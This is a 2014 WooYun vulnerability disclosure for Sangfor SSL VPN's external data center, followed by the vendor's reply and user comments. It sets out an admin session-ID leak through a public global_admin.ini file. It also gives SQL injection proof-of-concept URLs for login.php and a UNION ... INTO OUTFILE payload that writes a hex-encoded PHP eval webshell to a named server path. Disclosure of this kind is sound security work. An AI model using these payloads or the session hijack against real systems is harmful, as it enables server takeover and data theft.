深信服SSL VPN外置数据中心敏感信息泄漏&SQL注入漏洞可导致getshell

漏洞概要

缺陷编号:WooYun-2014-064698

漏洞标题:深信服SSL VPN外置数据中心敏感信息泄漏&SQL注入漏洞可导致getshell

相关厂商:深信服

漏洞作者:f4ckbaidu

提交时间:2014-06-12 20:01

公开时间:2014-09-10 20:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2014-06-12: 细节已通知厂商并且等待厂商处理中
2014-06-13: 厂商已经确认,细节仅向厂商公开
2014-06-16: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-08-07: 细节向核心白帽子及相关领域专家公开
2014-08-17: 细节向普通白帽子公开
2014-08-27: 细节向实习白帽子公开
2014-09-10: 细节向公众公开

简要描述:

测试版本为SSL 5.7的外置DC,主要有两个问题:
1、管理员sessionid泄漏
2、SQL注入

详细说明:

一、敏感信息泄漏:Admin用户登录后,会出现一个文件(Admin未登录时此文件不存在)里面包含了Admin用户的phpsessionid,并且任意用户可访问,如下图:**.**.**.**/global_admin.ini

利用方法类似XSS,其它用户将浏览器cookie phpsessionid改成对应的值,再访问/src/index.php就是管理员用户了,无需知道帐号密码利用fiddler把phpsessionid改成Admin对应的sessionid:

再访问/src/index.php,直接登录了:

系统设置--环境设置--其它,可以看到服务器绝对路径:

二、SQL注入/src/login.php代码审核:

php class adtLogin代码文件:/src/inc/class/adtLogin.class.php

OpenDb函数定义在/src/inc/class/SinforDbBase.class.php里

注入POC:https://IP/src/login.php?action_c=login&user_type=1g&user=admin&pass=admin&nodeid=3 and 1=1提示“用户名或密码不正确”https://IP/src/login.php?action_c=login&user_type=1g&user=admin&pass=admin&nodeid=3 and 1=2提示“连接数据库失败”由于有防爆破登录机制,这里用sqlmap注入会有很大麻烦,需要很长时间由于mysql用户是root,并且magic_quotes_gpc = Off,系统又是windows,呵呵了,直接getshell:https://IP/src/login.php?action_c=login&user_type=1&user=admin&pass=admin&nodeid=3 union select 0x3c3f70687020406576616c28245f504f53545b277362275d293b3f3e into outfile 'C:\Program Files\Sangfor\SSL\LogKeeper\htdocs\test.php'生成一句话,密码sb,访问地址:https://IP/test.php具体路径可以利用上面的管理员session泄漏漏洞登录系统后获取

漏洞证明:

getshell:

修复方案:

1、修正那搞笑的逻辑2、对参数做严格检查。比如intval

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-06-1314:14

厂商回复:

首先感谢白帽子对深信服产品提出的建议,经内部验证,有3点需要向您说明:
1、SSL VPN外置的数据中心主要存放VPN的相关日志,用于给管理员进行分析,对于SSL VPN的安全性影响较低;
2、SSL VPN的外置数据中心用户量较少,大部分功能都已经在SSL VPN设备上实现,只有少数用户会使用外置数据中心;
3、SSL VPN的数据中心部署于内网。基于以上三点原因,我们将漏洞级别降低为中级。同时,我们已经启动应急程序,会对数据中心安装包的安全性进行严格的审查和改善,尽快发布新版安装包。另外,工作人员已经私信给您,请留下联系方式,后续我们会寄出小礼物来对您表示感谢。 (^_^)首先感谢白帽子对深信服产品提出的建议,经内部验证:1、SSL VPN外置的数据中心主要存放VPN的操作日志,用于给管理员进行分析,不涉及到SSL VPN的权限安全问题,.....
2、SSL VPN的外置数据中心用量较小,大部分功能都已经在SSL VPN设备上实现,只有少数用户会使用外置数据中心;
3、SSL VPN的数据中心主要部署于内网,基于以上三点原因,我们将漏洞级别降低为中级。我们已经启动应急程序,会对数据中心安装包的安全性进行严格的审查和改善,尽快发布新版安装包。另外,工作人员已经私信给您,请留下联系方式,后续我们会寄出小礼物来表示对您的感谢。

最新状态:

暂无

评价

  1. 2010-01-01 00:00 小森森 白帽子 | Rank:11 漏洞数:2)

    关注……

  2. 2010-01-01 00:00 kgra 白帽子 | Rank:17 漏洞数:2)

    这种东西一般都是内网的吧?洞主咋搞的?

  3. 2010-01-01 00:00 小森森 白帽子 | Rank:11 漏洞数:2)

    @kgra 貌似比较常见的一种用途是提供给外网的,能访问内网资源的vpn。。高校们很多都在用

  4. 2010-01-01 00:00 大狮子 白帽子 | Rank:0 漏洞数:0)

    @小森森 使用外置DC的不多,外置DC允许外网访问的更少

  5. 2010-01-01 00:00 http://www.wooyun.org/corps/深信服 白帽子 | Rank:0 漏洞数:0)

    抱歉~ 由于操作失误,部分冗余信息未删除,请大家见谅~~

  6. 2010-01-01 00:00 乐乐、 白帽子 | Rank:528 漏洞数:57)

    @kgra 外网也不少呢

  7. 2010-01-01 00:00 小森森 白帽子 | Rank:11 漏洞数:2)

    @大狮子 额……是外置数据中心啊……之前没看到抱歉

  8. 2010-01-01 00:00 f4ckbaidu 白帽子 | Rank:215 漏洞数:21)

    描述部分有问题,我提交了N次修改,也PM了,怎么没人理?

  9. 2010-01-01 00:00 hacker@sina.cn 白帽子 | Rank:218 漏洞数:22)

    惊现洞主一只

  10. 2010-01-01 00:00 wefgod 白帽子 | Rank:1438 漏洞数:124)

    牛逼啊,为何路人甲

  11. 2010-01-01 00:00 f4ckbaidu 白帽子 | Rank:215 漏洞数:21)

    @疯狗,提现一周了,咋还没到帐呢。。。

  12. 2010-01-01 00:00 wellsun 白帽子 | Rank:0 漏洞数:0)

    诚心诚信RMB收购乌云币~ 价格加Q谈:7520024 (加者备注)